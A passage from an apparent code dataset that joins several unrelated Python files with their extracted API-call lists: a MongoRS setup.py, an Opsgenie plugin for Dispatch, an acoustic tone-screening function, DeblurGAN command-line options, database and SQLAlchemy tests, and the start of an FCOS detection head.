're.escape', (['framework_slug'], {}), '(framework_slug)\n', (2594, 2610), False, 'import re\n'), ((3429, 3466), 'dmutils.env_helpers.get_assets_endpoint_from_stage', 'get_assets_endpoint_from_stage', (['STAGE'], {}), '(STAGE)\n', (3459, 3466), False, 'from dmutils.env_helpers import get_api_endpoint_from_stage, get_assets_endpoint_from_stage\n'), ((5952, 5979), 'random.randint', 'random.randint', (['(1000)', '(10000)'], {}), '(1000, 10000)\n', (5966, 5979), False, 'import random\n'), ((7088, 7116), 'dmscripts.helpers.auth_helpers.get_auth_token', 'get_auth_token', (['"""api"""', 'STAGE'], {}), "('api', STAGE)\n", (7102, 7116), False, 'from dmscripts.helpers.auth_helpers import get_auth_token\n'), ((8046, 8097), 'dmscripts.helpers.framework_helpers.find_suppliers_on_framework', 'find_suppliers_on_framework', (['client', 'FRAMEWORK_SLUG'], {}), '(client, FRAMEWORK_SLUG)\n', (8073, 8097), False, 'from dmscripts.helpers.framework_helpers import find_suppliers_on_framework, get_submitted_drafts\n'), ((8255, 8323), 'dmscripts.helpers.framework_helpers.get_submitted_drafts', 'get_submitted_drafts', (['client', 'FRAMEWORK_SLUG', "supplier['supplierId']"], {}), "(client, FRAMEWORK_SLUG, supplier['supplierId'])\n", (8275, 8323), False, 'from dmscripts.helpers.framework_helpers import find_suppliers_on_framework, get_submitted_drafts\n'), ((8746, 8760), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (8758, 8760), False, 'from datetime import datetime\n')]
|
"""package setup"""
import sys
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
"""Our test runner."""
user_options = [('pytest-args=', 'a', "Arguments to pass to py.test")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = ["tests"]
def finalize_options(self):
# pylint: disable=W0201
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
# import here, cause outside the eggs aren't loaded
import pytest
errno = pytest.main(self.pytest_args)
sys.exit(errno)
setup(
name="MongoRS",
version="0.0.1",
package_dir={'': 'src'},
namespace_packages=[],
packages=find_packages(
'src',
exclude=[]
),
entry_points={
"console_scripts": [
"mongors = mongors.scripts:cli"
]
},
install_requires=[
"pymongo",
"click",
"gevent",
"simplejson",
],
cmdclass={'test': PyTest},
tests_require=[
# tests
'pytest',
'pytest-pep8',
]
)
|
[
"pytest.main",
"setuptools.command.test.test.finalize_options",
"sys.exit",
"setuptools.command.test.test.initialize_options",
"setuptools.find_packages"
] |
[((308, 344), 'setuptools.command.test.test.initialize_options', 'TestCommand.initialize_options', (['self'], {}), '(self)\n', (338, 344), True, 'from setuptools.command.test import test as TestCommand\n'), ((455, 489), 'setuptools.command.test.test.finalize_options', 'TestCommand.finalize_options', (['self'], {}), '(self)\n', (483, 489), True, 'from setuptools.command.test import test as TestCommand\n'), ((673, 702), 'pytest.main', 'pytest.main', (['self.pytest_args'], {}), '(self.pytest_args)\n', (684, 702), False, 'import pytest\n'), ((711, 726), 'sys.exit', 'sys.exit', (['errno'], {}), '(errno)\n', (719, 726), False, 'import sys\n'), ((847, 879), 'setuptools.find_packages', 'find_packages', (['"""src"""'], {'exclude': '[]'}), "('src', exclude=[])\n", (860, 879), False, 'from setuptools import setup, find_packages\n')]
|
"""
.. module: dispatch.plugins.dispatch_opsgenie.plugin
:platform: Unix
:copyright: (c) 2019 by Netflix Inc., see AUTHORS for more
:license: Apache, see LICENSE for more details.
"""
import logging
from pydantic import Field, SecretStr
from dispatch.config import BaseConfigurationModel
from dispatch.decorators import apply, counter, timer
from dispatch.plugins.bases import OncallPlugin
from .service import get_oncall, page_oncall
__version__ = "0.1.0"
log = logging.getLogger(__name__)
class OpsgenieConfiguration(BaseConfigurationModel):
"""Opsgenie configuration description."""
api_key: SecretStr = Field(
title="API Key", description="This is the key used to talk to the Opsgenine API."
)
@apply(counter, exclude=["__init__"])
@apply(timer, exclude=["__init__"])
class OpsGenieOncallPlugin(OncallPlugin):
title = "OpsGenie Plugin - Oncall Management"
slug = "opsgenie-oncall"
author = "stefanm8"
author_url = "https://github.com/Netflix/dispatch"
description = "Uses Opsgenie to resolve and page oncall teams."
version = __version__
def __init__(self):
self.configuration_schema = OpsgenieConfiguration
def get(self, service_id: str, **kwargs):
return get_oncall(self.configuration.api_key, service_id)
def page(
self,
service_id: str,
incident_name: str,
incident_title: str,
incident_description: str,
**kwargs,
):
return page_oncall(
self.configuration.api_key,
service_id,
incident_name,
incident_title,
incident_description,
)
|
[
"pydantic.Field",
"dispatch.decorators.apply",
"logging.getLogger"
] |
[((481, 508), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (498, 508), False, 'import logging\n'), ((742, 778), 'dispatch.decorators.apply', 'apply', (['counter'], {'exclude': "['__init__']"}), "(counter, exclude=['__init__'])\n", (747, 778), False, 'from dispatch.decorators import apply, counter, timer\n'), ((780, 814), 'dispatch.decorators.apply', 'apply', (['timer'], {'exclude': "['__init__']"}), "(timer, exclude=['__init__'])\n", (785, 814), False, 'from dispatch.decorators import apply, counter, timer\n'), ((636, 729), 'pydantic.Field', 'Field', ([], {'title': '"""API Key"""', 'description': '"""This is the key used to talk to the Opsgenine API."""'}), "(title='API Key', description=\n 'This is the key used to talk to the Opsgenine API.')\n", (641, 729), False, 'from pydantic import Field, SecretStr\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 16 20:23:01 2020
@author: wantysal
"""
# Standard library imports
import numpy as np
# Mosqito functions import
from mosqito.sq_metrics.tonality.tone_to_noise_ecma._spectrum_smoothing import _spectrum_smoothing
from mosqito.sq_metrics.tonality.tone_to_noise_ecma._LTH import _LTH
from mosqito.sq_metrics.tonality.tone_to_noise_ecma._critical_band import _critical_band
def _screening_for_tones(freqs, spec_db, method, low_freq, high_freq):
"""
Screening function to find the tonal candidates in a spectrum
The 'smoothed' method is the one described by <NAME> and <NAME> in :
Automating prominent tone evaluations and accounting for time-varying
conditions, Sound Quality Symposium, SQS 2008, Detroit, 2008.
The 'not-smoothed' method is the one used by Aures and Terhardt
The criteria of tonal width comes from Wade Bray in 'Methods for automating
prominent tone evaluation and for considering variations with time or other
reference quantities'
Parameters
----------
freqs : numpy.array
frequency axis (n blocks x frequency axis)
spec_db : numpy.array
spectrum in dB (n block x spectrum)
method : string
the method chosen to find the tones 'Sottek'
low_freq : float
lowest frequency of interest
high_freq : float
highest frequency of interest
Returns
-------
tones : list
list of index corresponding to the potential tonal components
"""
###############################################################################
# Detection of the tonal candidates according to their level
# Creation of the smoothed spectrum
smooth_spec = _spectrum_smoothing(freqs, spec_db.T, 24, low_freq, high_freq, freqs).T
n = spec_db.shape[0]
if len(spec_db.shape)>1:
m = spec_db.shape[1]
stop = np.arange(1,n+1) * m -1
else:
m = spec_db.shape[0]
n = 1
stop = [m]
smooth_spec = smooth_spec.ravel()
spec_db = spec_db.ravel()
freqs = freqs.ravel()
if method == "smoothed":
# Criteria 1 : the level of the spectral line is higher than the level of
# the two neighboring lines
maxima = (np.diff(np.sign(np.diff(spec_db))) < 0).nonzero()[0] + 1
# Criteria 2 : the level of the spectral line exceeds the corresponding lines
# of the 1/24 octave smoothed spectrum by at least 6 dB
indexx = np.where(spec_db[maxima] > smooth_spec[maxima] + 6)[0]
# Criteria 3 : the level of the spectral line exceeds the threshold of hearing
threshold = _LTH(freqs)
audible = np.where(spec_db[maxima][indexx] > threshold[maxima][indexx] + 10)[0]
index = np.arange(0, len(spec_db))[maxima][indexx][audible]
if method == "not-smoothed":
# Criteria 1 : the level of the spectral line is higher than the level of
# the two neighboring lines
maxima = (
np.diff(np.sign(np.diff(spec_db[3 : len(spec_db) - 3]))) < 0
).nonzero()[
0
] + 1 # local max
# Criteria 2 : the level of the spectral line is at least 7 dB higher than its
# +/- 2,3 neighbors
indexx = np.where(
(spec_db[maxima] > (spec_db[maxima + 2] + 7))
& (spec_db[maxima] > (spec_db[maxima - 2] + 7))
& (spec_db[maxima] > (spec_db[maxima + 3] + 7))
& (spec_db[maxima] > (spec_db[maxima - 3] + 7))
)[0]
# Criteria 3 : the level of the spectral line exceeds the threshold of hearing
threshold = _LTH(freqs)
audible = np.where(spec_db[maxima][indexx] > threshold[maxima][indexx] + 10)[0]
index = np.arange(0, len(spec_db))[maxima][indexx][audible]
###############################################################################
# Check of the tones width : a candidate is discarded if its width is greater
# than half the critical bandwidth
if n == 1:
tones = []
else:
tones = [[]for i in range(n)]
# Each candidate is evaluated
while len(index) > 0:
# Index of the candidate
peak_index = index[0]
for i in range(n):
if (peak_index<stop[i]) & (peak_index>(stop[i]-m)):
block = i
# Lower and higher limits of the tone width
low_limit = peak_index
high_limit = peak_index
# Screen the right points of the peak
temp = peak_index + 1
# As long as the level decreases or remains above the smoothed spectrum,
while (spec_db[temp] > smooth_spec[temp] + 6) and (temp + 1 < (block+1)*m):
# if a highest spectral line is found, it becomes the candidate
if spec_db[temp] > spec_db[peak_index]:
peak_index = temp
high_limit += 1
temp += 1
# Screen the left points of the peak
temp = peak_index - 1
# As long as the level decreases,
while (spec_db[temp] > smooth_spec[temp] + 6) and (temp +1 > (block)*m):
# if a highest spectral line is found, it becomes the candidate
if spec_db[temp] > spec_db[peak_index]:
peak_index = temp
low_limit -= 1
temp -= 1
# Critical bandwidth
f1, f2 = _critical_band(freqs[peak_index])
cb_width = f2 - f1
# Tonal width
t_width = freqs[high_limit] - freqs[low_limit]
if t_width < cb_width:
if n>1:
tones[block] = np.append(tones[block], peak_index - block*m)
else:
tones = np.append(tones, peak_index )
# All the candidates already screened are deleted from the list
sup = np.where(index <= high_limit)[0]
index = np.delete(index, sup)
tones = np.asarray(tones, dtype=object)
return tones
|
[
"mosqito.sq_metrics.tonality.tone_to_noise_ecma._critical_band._critical_band",
"mosqito.sq_metrics.tonality.tone_to_noise_ecma._LTH._LTH",
"numpy.asarray",
"numpy.append",
"numpy.where",
"numpy.arange",
"numpy.diff",
"mosqito.sq_metrics.tonality.tone_to_noise_ecma._spectrum_smoothing._spectrum_smoothing",
"numpy.delete"
] |
[((5967, 5998), 'numpy.asarray', 'np.asarray', (['tones'], {'dtype': 'object'}), '(tones, dtype=object)\n', (5977, 5998), True, 'import numpy as np\n'), ((1765, 1834), 'mosqito.sq_metrics.tonality.tone_to_noise_ecma._spectrum_smoothing._spectrum_smoothing', '_spectrum_smoothing', (['freqs', 'spec_db.T', '(24)', 'low_freq', 'high_freq', 'freqs'], {}), '(freqs, spec_db.T, 24, low_freq, high_freq, freqs)\n', (1784, 1834), False, 'from mosqito.sq_metrics.tonality.tone_to_noise_ecma._spectrum_smoothing import _spectrum_smoothing\n'), ((2711, 2722), 'mosqito.sq_metrics.tonality.tone_to_noise_ecma._LTH._LTH', '_LTH', (['freqs'], {}), '(freqs)\n', (2715, 2722), False, 'from mosqito.sq_metrics.tonality.tone_to_noise_ecma._LTH import _LTH\n'), ((3688, 3699), 'mosqito.sq_metrics.tonality.tone_to_noise_ecma._LTH._LTH', '_LTH', (['freqs'], {}), '(freqs)\n', (3692, 3699), False, 'from mosqito.sq_metrics.tonality.tone_to_noise_ecma._LTH import _LTH\n'), ((5452, 5485), 'mosqito.sq_metrics.tonality.tone_to_noise_ecma._critical_band._critical_band', '_critical_band', (['freqs[peak_index]'], {}), '(freqs[peak_index])\n', (5466, 5485), False, 'from mosqito.sq_metrics.tonality.tone_to_noise_ecma._critical_band import _critical_band\n'), ((5928, 5949), 'numpy.delete', 'np.delete', (['index', 'sup'], {}), '(index, sup)\n', (5937, 5949), True, 'import numpy as np\n'), ((2548, 2599), 'numpy.where', 'np.where', (['(spec_db[maxima] > smooth_spec[maxima] + 6)'], {}), '(spec_db[maxima] > smooth_spec[maxima] + 6)\n', (2556, 2599), True, 'import numpy as np\n'), ((2741, 2807), 'numpy.where', 'np.where', (['(spec_db[maxima][indexx] > threshold[maxima][indexx] + 10)'], {}), '(spec_db[maxima][indexx] > threshold[maxima][indexx] + 10)\n', (2749, 2807), True, 'import numpy as np\n'), ((3319, 3519), 'numpy.where', 'np.where', (['((spec_db[maxima] > spec_db[maxima + 2] + 7) & (spec_db[maxima] > spec_db[\n maxima - 2] + 7) & (spec_db[maxima] > spec_db[maxima + 3] + 7) & (\n spec_db[maxima] > spec_db[maxima - 3] + 7))'], {}), '((spec_db[maxima] > spec_db[maxima + 2] + 7) & (spec_db[maxima] > \n spec_db[maxima - 2] + 7) & (spec_db[maxima] > spec_db[maxima + 3] + 7) &\n (spec_db[maxima] > spec_db[maxima - 3] + 7))\n', (3327, 3519), True, 'import numpy as np\n'), ((3718, 3784), 'numpy.where', 'np.where', (['(spec_db[maxima][indexx] > threshold[maxima][indexx] + 10)'], {}), '(spec_db[maxima][indexx] > threshold[maxima][indexx] + 10)\n', (3726, 3784), True, 'import numpy as np\n'), ((5879, 5908), 'numpy.where', 'np.where', (['(index <= high_limit)'], {}), '(index <= high_limit)\n', (5887, 5908), True, 'import numpy as np\n'), ((1946, 1965), 'numpy.arange', 'np.arange', (['(1)', '(n + 1)'], {}), '(1, n + 1)\n', (1955, 1965), True, 'import numpy as np\n'), ((5674, 5721), 'numpy.append', 'np.append', (['tones[block]', '(peak_index - block * m)'], {}), '(tones[block], peak_index - block * m)\n', (5683, 5721), True, 'import numpy as np\n'), ((5762, 5790), 'numpy.append', 'np.append', (['tones', 'peak_index'], {}), '(tones, peak_index)\n', (5771, 5790), True, 'import numpy as np\n'), ((2339, 2355), 'numpy.diff', 'np.diff', (['spec_db'], {}), '(spec_db)\n', (2346, 2355), True, 'import numpy as np\n')]
|
import argparse
import os
from util import util
import torch
class BaseOptions():
def __init__(self):
self.parser = argparse.ArgumentParser()
self.initialized = False
def initialize(self):
self.parser.add_argument('--dataroot', type=str, default="/content/DeblurGAN/input_img/", help='path to images (should have subfolders trainA, trainB, valA, valB, etc)')
self.parser.add_argument('--batchSize', type=int, default=1, help='input batch size')
self.parser.add_argument('--loadSizeX', type=int, default=640, help='scale images to this size')
self.parser.add_argument('--loadSizeY', type=int, default=360, help='scale images to this size')
self.parser.add_argument('--fineSize', type=int, default=256, help='then crop to this size')
self.parser.add_argument('--input_nc', type=int, default=3, help='# of input image channels')
self.parser.add_argument('--output_nc', type=int, default=3, help='# of output image channels')
self.parser.add_argument('--ngf', type=int, default=64, help='# of gen filters in first conv layer')
self.parser.add_argument('--ndf', type=int, default=64, help='# of discrim filters in first conv layer')
self.parser.add_argument('--which_model_netD', type=str, default='basic', help='selects model to use for netD')
self.parser.add_argument('--which_model_netG', type=str, default='resnet_9blocks', help='selects model to use for netG')
self.parser.add_argument('--learn_residual', action='store_true', help='if specified, model would learn only the residual to the input')
self.parser.add_argument('--gan_type', type=str, default='wgan-gp', help='wgan-gp : Wasserstein GAN with Gradient Penalty, lsgan : Least Sqaures GAN, gan : Vanilla GAN')
self.parser.add_argument('--n_layers_D', type=int, default=3, help='only used if which_model_netD==n_layers')
self.parser.add_argument('--gpu_ids', type=str, default='0', help='gpu ids: e.g. 0 0,1,2, 0,2. use -1 for CPU')
self.parser.add_argument('--name', type=str, default='experiment_name', help='name of the experiment. It decides where to store samples and models')
self.parser.add_argument('--dataset_mode', type=str, default='aligned', help='chooses how datasets are loaded. [unaligned | aligned | single]')
self.parser.add_argument('--model', type=str, default='content_gan', help='chooses which model to use. pix2pix, test, content_gan')
self.parser.add_argument('--which_direction', type=str, default='AtoB', help='AtoB or BtoA')
self.parser.add_argument('--nThreads', default=2, type=int, help='# threads for loading data')
self.parser.add_argument('--checkpoints_dir', type=str, default='./checkpoints', help='models are saved here')
self.parser.add_argument('--norm', type=str, default='instance', help='instance normalization or batch normalization')
self.parser.add_argument('--serial_batches', action='store_true', help='if true, takes images in order to make batches, otherwise takes them randomly')
self.parser.add_argument('--display_winsize', type=int, default=256, help='display window size')
self.parser.add_argument('--display_id', type=int, default=1, help='window id of the web display')
self.parser.add_argument('--display_port', type=int, default=8097, help='visdom port of the web display')
self.parser.add_argument('--display_single_pane_ncols', type=int, default=0, help='if positive, display all images in a single visdom web panel with certain number of images per row.')
self.parser.add_argument('--no_dropout', action='store_true', help='no dropout for the generator')
self.parser.add_argument('--max_dataset_size', type=int, default=float("inf"), help='Maximum number of samples allowed per dataset. If the dataset directory contains more than max_dataset_size, only a subset is loaded.')
self.parser.add_argument('--resize_or_crop', type=str, default='resize_and_crop', help='scaling and cropping of images at load time [resize_and_crop|crop|scale_width|scale_width_and_crop]')
self.parser.add_argument('--no_flip', action='store_true', help='if specified, do not flip the images for data augmentation')
self.initialized = True
def parse(self):
if not self.initialized:
self.initialize()
self.opt = self.parser.parse_args()
self.opt.isTrain = self.isTrain # train or test
str_ids = self.opt.gpu_ids.split(',')
self.opt.gpu_ids = []
for str_id in str_ids:
id = int(str_id)
if id >= 0:
self.opt.gpu_ids.append(id)
# set gpu ids
if len(self.opt.gpu_ids) > 0:
torch.cuda.set_device(self.opt.gpu_ids[0])
args = vars(self.opt)
print('------------ Options -------------')
for k, v in sorted(args.items()):
print('%s: %s' % (str(k), str(v)))
print('-------------- End ----------------')
# save to the disk
expr_dir = os.path.join(self.opt.checkpoints_dir, self.opt.name)
util.mkdirs(expr_dir)
file_name = os.path.join(expr_dir, 'opt.txt')
with open(file_name, 'wt') as opt_file:
opt_file.write('------------ Options -------------\n')
for k, v in sorted(args.items()):
opt_file.write('%s: %s\n' % (str(k), str(v)))
opt_file.write('-------------- End ----------------\n')
return self.opt
|
[
"torch.cuda.set_device",
"os.path.join",
"argparse.ArgumentParser",
"util.util.mkdirs"
] |
[((120, 145), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (143, 145), False, 'import argparse\n'), ((4744, 4797), 'os.path.join', 'os.path.join', (['self.opt.checkpoints_dir', 'self.opt.name'], {}), '(self.opt.checkpoints_dir, self.opt.name)\n', (4756, 4797), False, 'import os\n'), ((4800, 4821), 'util.util.mkdirs', 'util.mkdirs', (['expr_dir'], {}), '(expr_dir)\n', (4811, 4821), False, 'from util import util\n'), ((4836, 4869), 'os.path.join', 'os.path.join', (['expr_dir', '"""opt.txt"""'], {}), "(expr_dir, 'opt.txt')\n", (4848, 4869), False, 'import os\n'), ((4473, 4515), 'torch.cuda.set_device', 'torch.cuda.set_device', (['self.opt.gpu_ids[0]'], {}), '(self.opt.gpu_ids[0])\n', (4494, 4515), False, 'import torch\n')]
|
import pytest
from rentomatic.repository.postgres_objects import Room
from rentomatic.repository import postgresrepo
pytestmark = pytest.mark.integration
def test_repository_list_without_parameters(docker_setup, pg_data, pg_session):
repo = postgresrepo.PostgresRepo(docker_setup['postgres'])
repo_rooms = repo.list()
assert set([r.code for r in repo_rooms]) == set(
[r['code'] for r in pg_data])
def test_repository_list_with_price_equal_filter(docker_setup, pg_data, pg_session):
repo = postgresrepo.PostgresRepo(docker_setup['postgres'])
repo_rooms = repo.list(
filters={'price__eq': 60}
)
assert len(repo_rooms) == 1
assert repo_rooms[0].code == '913694c6-435a-4366-ba0d-da5334a611b2'
def test_repository_list_with_price_less_than_filter(docker_setup, pg_data, pg_session):
repo = postgresrepo.PostgresRepo(docker_setup['postgres'])
repo_rooms = repo.list(filters={
'price__lt': 60
})
assert len(repo_rooms) == 2
assert set([r.code for r in repo_rooms]) == {
'f853578c-fc0f-4e65-81b8-566c5dffa35a',
'eed76e77-55c1-41ce-985d-ca49bf6c0585'
}
def test_repository_list_with_price_greater_than_filter(
docker_setup, pg_data, pg_session):
repo = postgresrepo.PostgresRepo(docker_setup['postgres'])
repo_rooms = repo.list(
filters={'price__gt': 48}
)
assert len(repo_rooms) == 2
assert set([r.code for r in repo_rooms]) == {
'913694c6-435a-4366-ba0d-da5334a611b2',
'fe2c3195-aeff-487a-a08f-e0bdc0ec6e9a'
}
def test_repository_list_with_price_between_filter(
docker_setup, pg_data, pg_session):
repo = postgresrepo.PostgresRepo(docker_setup['postgres'])
repo_rooms = repo.list(
filters={
'price__lt': 66,
'price__gt': 48
}
)
assert len(repo_rooms) == 1
assert repo_rooms[0].code == '913694c6-435a-4366-ba0d-da5334a611b2'
|
[
"rentomatic.repository.postgresrepo.PostgresRepo"
] |
[((249, 300), 'rentomatic.repository.postgresrepo.PostgresRepo', 'postgresrepo.PostgresRepo', (["docker_setup['postgres']"], {}), "(docker_setup['postgres'])\n", (274, 300), False, 'from rentomatic.repository import postgresrepo\n'), ((521, 572), 'rentomatic.repository.postgresrepo.PostgresRepo', 'postgresrepo.PostgresRepo', (["docker_setup['postgres']"], {}), "(docker_setup['postgres'])\n", (546, 572), False, 'from rentomatic.repository import postgresrepo\n'), ((849, 900), 'rentomatic.repository.postgresrepo.PostgresRepo', 'postgresrepo.PostgresRepo', (["docker_setup['postgres']"], {}), "(docker_setup['postgres'])\n", (874, 900), False, 'from rentomatic.repository import postgresrepo\n'), ((1268, 1319), 'rentomatic.repository.postgresrepo.PostgresRepo', 'postgresrepo.PostgresRepo', (["docker_setup['postgres']"], {}), "(docker_setup['postgres'])\n", (1293, 1319), False, 'from rentomatic.repository import postgresrepo\n'), ((1682, 1733), 'rentomatic.repository.postgresrepo.PostgresRepo', 'postgresrepo.PostgresRepo', (["docker_setup['postgres']"], {}), "(docker_setup['postgres'])\n", (1707, 1733), False, 'from rentomatic.repository import postgresrepo\n')]
|
import pytest
import sqlalchemy as sa
from sqlalchemy.orm import dynamic_loader
from sqlalchemy_utils.observer import observes
@pytest.fixture
def Director(Base):
class Director(Base):
__tablename__ = 'director'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.String)
movies = dynamic_loader('Movie', back_populates='director')
return Director
@pytest.fixture
def Movie(Base, Director):
class Movie(Base):
__tablename__ = 'movie'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.String)
director_id = sa.Column(sa.Integer, sa.ForeignKey(Director.id))
director = sa.orm.relationship(Director, back_populates='movies')
director_name = sa.Column(sa.String)
@observes('director')
def director_observer(self, director):
self.director_name = director.name
return Movie
@pytest.fixture
def init_models(Director, Movie):
pass
@pytest.mark.usefixtures('postgresql_dsn')
class TestObservesForDynamicRelationship:
def test_add_observed_object(self, session, Director, Movie):
steven = Director(name='<NAME>')
session.add(steven)
jaws = Movie(name='Jaws', director=steven)
session.add(jaws)
session.commit()
assert jaws.director_name == '<NAME>'
def test_add_observed_object_from_backref(self, session, Director, Movie):
jaws = Movie(name='Jaws')
steven = Director(name='<NAME>', movies=[jaws])
session.add(steven)
session.add(jaws)
session.commit()
assert jaws.director_name == '<NAME>'
|
[
"sqlalchemy_utils.observer.observes",
"sqlalchemy.orm.dynamic_loader",
"sqlalchemy.ForeignKey",
"sqlalchemy.orm.relationship",
"sqlalchemy.Column",
"pytest.mark.usefixtures"
] |
[((992, 1033), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""postgresql_dsn"""'], {}), "('postgresql_dsn')\n", (1015, 1033), False, 'import pytest\n'), ((240, 279), 'sqlalchemy.Column', 'sa.Column', (['sa.Integer'], {'primary_key': '(True)'}), '(sa.Integer, primary_key=True)\n', (249, 279), True, 'import sqlalchemy as sa\n'), ((295, 315), 'sqlalchemy.Column', 'sa.Column', (['sa.String'], {}), '(sa.String)\n', (304, 315), True, 'import sqlalchemy as sa\n'), ((333, 383), 'sqlalchemy.orm.dynamic_loader', 'dynamic_loader', (['"""Movie"""'], {'back_populates': '"""director"""'}), "('Movie', back_populates='director')\n", (347, 383), False, 'from sqlalchemy.orm import dynamic_loader\n'), ((518, 557), 'sqlalchemy.Column', 'sa.Column', (['sa.Integer'], {'primary_key': '(True)'}), '(sa.Integer, primary_key=True)\n', (527, 557), True, 'import sqlalchemy as sa\n'), ((573, 593), 'sqlalchemy.Column', 'sa.Column', (['sa.String'], {}), '(sa.String)\n', (582, 593), True, 'import sqlalchemy as sa\n'), ((685, 739), 'sqlalchemy.orm.relationship', 'sa.orm.relationship', (['Director'], {'back_populates': '"""movies"""'}), "(Director, back_populates='movies')\n", (704, 739), True, 'import sqlalchemy as sa\n'), ((764, 784), 'sqlalchemy.Column', 'sa.Column', (['sa.String'], {}), '(sa.String)\n', (773, 784), True, 'import sqlalchemy as sa\n'), ((795, 815), 'sqlalchemy_utils.observer.observes', 'observes', (['"""director"""'], {}), "('director')\n", (803, 815), False, 'from sqlalchemy_utils.observer import observes\n'), ((638, 664), 'sqlalchemy.ForeignKey', 'sa.ForeignKey', (['Director.id'], {}), '(Director.id)\n', (651, 664), True, 'import sqlalchemy as sa\n')]
|
import click
import json
import os
from xdg import XDG_CONFIG_HOME
class InvalidDataDirException(Exception):
pass
def get_data_dir():
if os.environ.get('NLGEVAL_DATA'):
if not os.path.exists(os.environ.get('NLGEVAL_DATA')):
click.secho("NLGEVAL_DATA variable is set but points to non-existent path.", fg='red', err=True)
raise InvalidDataDirException()
return os.environ.get('NLGEVAL_DATA')
else:
try:
cfg_file = os.path.join(XDG_CONFIG_HOME, 'nlgeval', 'rc.json')
with open(cfg_file, 'rt') as f:
rc = json.load(f)
if not os.path.exists(rc['data_path']):
click.secho("Data path found in {} does not exist: {} " % (cfg_file, rc['data_path']), fg='red', err=True)
click.secho("Run `nlg-eval --setup DATA_DIR' to download or set $NLGEVAL_DATA to an existing location",
fg='red', err=True)
raise InvalidDataDirException()
return rc['data_path']
except:
click.secho("Could not determine location of data.", fg='red', err=True)
click.secho("Run `nlg-eval --setup DATA_DIR' to download or set $NLGEVAL_DATA to an existing location", fg='red',
err=True)
raise InvalidDataDirException()
|
[
"json.load",
"os.path.exists",
"os.environ.get",
"click.secho",
"os.path.join"
] |
[((148, 178), 'os.environ.get', 'os.environ.get', (['"""NLGEVAL_DATA"""'], {}), "('NLGEVAL_DATA')\n", (162, 178), False, 'import os\n'), ((411, 441), 'os.environ.get', 'os.environ.get', (['"""NLGEVAL_DATA"""'], {}), "('NLGEVAL_DATA')\n", (425, 441), False, 'import os\n'), ((255, 355), 'click.secho', 'click.secho', (['"""NLGEVAL_DATA variable is set but points to non-existent path."""'], {'fg': '"""red"""', 'err': '(True)'}), "('NLGEVAL_DATA variable is set but points to non-existent path.',\n fg='red', err=True)\n", (266, 355), False, 'import click\n'), ((488, 539), 'os.path.join', 'os.path.join', (['XDG_CONFIG_HOME', '"""nlgeval"""', '"""rc.json"""'], {}), "(XDG_CONFIG_HOME, 'nlgeval', 'rc.json')\n", (500, 539), False, 'import os\n'), ((210, 240), 'os.environ.get', 'os.environ.get', (['"""NLGEVAL_DATA"""'], {}), "('NLGEVAL_DATA')\n", (224, 240), False, 'import os\n'), ((605, 617), 'json.load', 'json.load', (['f'], {}), '(f)\n', (614, 617), False, 'import json\n'), ((1096, 1168), 'click.secho', 'click.secho', (['"""Could not determine location of data."""'], {'fg': '"""red"""', 'err': '(True)'}), "('Could not determine location of data.', fg='red', err=True)\n", (1107, 1168), False, 'import click\n'), ((1181, 1314), 'click.secho', 'click.secho', (['"""Run `nlg-eval --setup DATA_DIR\' to download or set $NLGEVAL_DATA to an existing location"""'], {'fg': '"""red"""', 'err': '(True)'}), '(\n "Run `nlg-eval --setup DATA_DIR\' to download or set $NLGEVAL_DATA to an existing location"\n , fg=\'red\', err=True)\n', (1192, 1314), False, 'import click\n'), ((641, 672), 'os.path.exists', 'os.path.exists', (["rc['data_path']"], {}), "(rc['data_path'])\n", (655, 672), False, 'import os\n'), ((694, 805), 'click.secho', 'click.secho', (["('Data path found in {} does not exist: {} ' % (cfg_file, rc['data_path']))"], {'fg': '"""red"""', 'err': '(True)'}), "('Data path found in {} does not exist: {} ' % (cfg_file, rc[\n 'data_path']), fg='red', err=True)\n", (705, 805), False, 'import click\n'), ((821, 954), 'click.secho', 'click.secho', (['"""Run `nlg-eval --setup DATA_DIR\' to download or set $NLGEVAL_DATA to an existing location"""'], {'fg': '"""red"""', 'err': '(True)'}), '(\n "Run `nlg-eval --setup DATA_DIR\' to download or set $NLGEVAL_DATA to an existing location"\n , fg=\'red\', err=True)\n', (832, 954), False, 'import click\n')]
|
import torch
import torch.nn as nn
from mmcv.cnn import normal_init
from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms
from ..builder import build_loss
from ..registry import HEADS
from ..utils import ConvModule, Scale, bias_init_with_prob
from IPython import embed
INF = 1e8
@HEADS.register_module
class FCOSTSHead(nn.Module):
"""
Fully Convolutional One-Stage Object Detection head from [1]_.
The FCOS head does not use anchor boxes. Instead bounding boxes are
predicted at each pixel and a centerness measure is used to supress
low-quality predictions.
References:
.. [1] https://arxiv.org/abs/1904.01355
Example:
>>> self = FCOSHead(11, 7)
>>> feats = [torch.rand(1, 7, s, s) for s in [4, 8, 16, 32, 64]]
>>> cls_score, bbox_pred, centerness = self.forward(feats)
>>> assert len(cls_score) == len(self.scales)
"""
def __init__(self,
num_classes,
in_channels,
feat_channels=256,
stacked_convs=4,
strides=(4, 8, 16, 32, 64),
regress_ranges=((-1, 64), (64, 128), (128, 256), (256, 512),
(512, INF)),
t_s_ratio=4,
eval_student=True,
training=True,
learn_when_train=False,
align_level=1,
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox=dict(type='IoULoss', loss_weight=1.0),
loss_s_t_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_s_t_reg=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_centerness=dict(
type='CrossEntropyLoss',
use_sigmoid=True,
loss_weight=1.0),
conv_cfg=None,
norm_cfg=dict(type='GN', num_groups=32, requires_grad=True)):
super(FCOSTSHead, self).__init__()
self.num_classes = num_classes
self.cls_out_channels = num_classes - 1
self.in_channels = in_channels
self.feat_channels = feat_channels
self.stacked_convs = stacked_convs
self.strides = strides
